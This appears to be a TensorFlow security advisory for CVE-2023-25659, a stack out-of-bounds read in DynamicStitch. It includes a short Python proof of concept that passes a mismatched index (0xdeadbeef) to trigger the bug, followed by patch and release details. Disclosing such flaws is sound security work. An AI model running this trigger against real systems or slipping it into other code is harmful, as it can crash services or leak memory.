CVE-2023-25659
If the parameter indices for DynamicStitch does not match the shape of the parameter data, it can trigger an stack OOB read.
import tensorflow as tf
func = tf.raw_ops.DynamicStitch
para={'indices': [[0xdeadbeef], [405], [519], [758], [1015]], 'data': [[110.27793884277344], [120.29475402832031], [157.2418212890625], [157.2626953125], [188.45382690429688]]}
y = func(**para)We have patched the issue in GitHub commit ee004b18b976eeb5a758020af8880236cd707d05.
The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
This has been reported via Google OSS VRP.